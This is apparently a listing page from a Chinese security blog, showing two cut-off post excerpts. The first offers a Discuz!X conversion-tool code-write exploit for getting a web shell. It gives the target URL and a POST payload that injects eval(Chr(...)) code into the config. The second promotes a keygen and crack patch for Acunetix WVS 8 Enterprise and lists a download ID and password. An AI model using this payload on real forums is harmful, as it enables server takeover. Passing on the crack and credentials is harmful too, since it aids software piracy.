Discuz!X系列转换工具任意代码写入漏洞 getshell

   
分类:安全 | 2015-02-10 | 撸过 5,992 次
1人扯蛋

有些论坛 可能路径放在其它目录 没有utility 直接convert等

如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功

http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0

post提交:

a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897[......]

继续阅读

Acunetix Web Vulnerability Scanner 8.x Enterprise Edition KeyGen By Hmily[LCG]

   
分类:工具 | 2012-04-19 | 撸过 2,752 次
0人扯蛋

这是一款网络漏洞扫描工具。通过网络爬虫测试你的网站安全,检测流行的攻击 ,如交叉站点脚本,sql 注入等。在被黑客攻击前扫描购物车,表格、安全区域和其他Web应用程序。75% 的互联网攻击目标是基于Web的应用程序。因为他们时常接触机密数据并且被放置在防火墙之前。

企业原版下载地址:http://www.acunetix.com/download/fullver8

ID: acunetixwvsfullv8

PassWord: nFu834!29bg_S2q

使用说明:先通过官方地址下载最新的企业版安装包[注册机只支持企业版,不支持free版],安装完成后关闭程序打开破解补丁,点P[......]

继续阅读